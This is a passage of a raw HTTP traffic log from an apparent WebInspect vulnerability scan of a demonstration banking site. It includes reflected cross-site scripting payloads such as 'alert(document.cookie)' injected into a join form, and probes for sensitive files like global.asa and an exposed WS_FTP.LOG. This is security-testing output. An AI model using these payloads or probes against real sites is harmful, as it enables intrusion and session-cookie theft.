<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /_private/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_private/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=333%2D333%2D3333test@test999.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:17 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 104
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data 333-333-3333test@test999.com<br>Please try again.
</body>
</html>
GET /admin/cgi.zip HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:37 GMT
Content-Type: application/x-zip-compressed
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT
ETag: "7ac34bf7a9dc11:8f6"
Content-Length: 82
<html> This should not show up. if so it is because it does not check right</html>GET /_vti_bin/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:46:50 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /global.asa HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:30:15 GMT
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 4231
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</id></h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Edit the page address in the Address bar to remove global.asa and press <strong>Enter</strong>.</li>
<li>If a link brought you to this Web page, contact that Web site's administrator.</li>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script> home page, and then look for links to the information you want.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the <script> Homepage();</script> home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP Error 500-15 - Requests for global.asa not allowed<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=500.15&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=test@<script>alert(document.cookie)</script>.com&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=test@<script>alert(document.cookie)</script>.com&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:37 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /images/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:10 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /admin/WS_FTP.LOG HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:31 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Fri, 19 Oct 2001 03:54:02 GMT
ETag: "623ab4b05158c11:8f6"
Content-Length: 4940
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
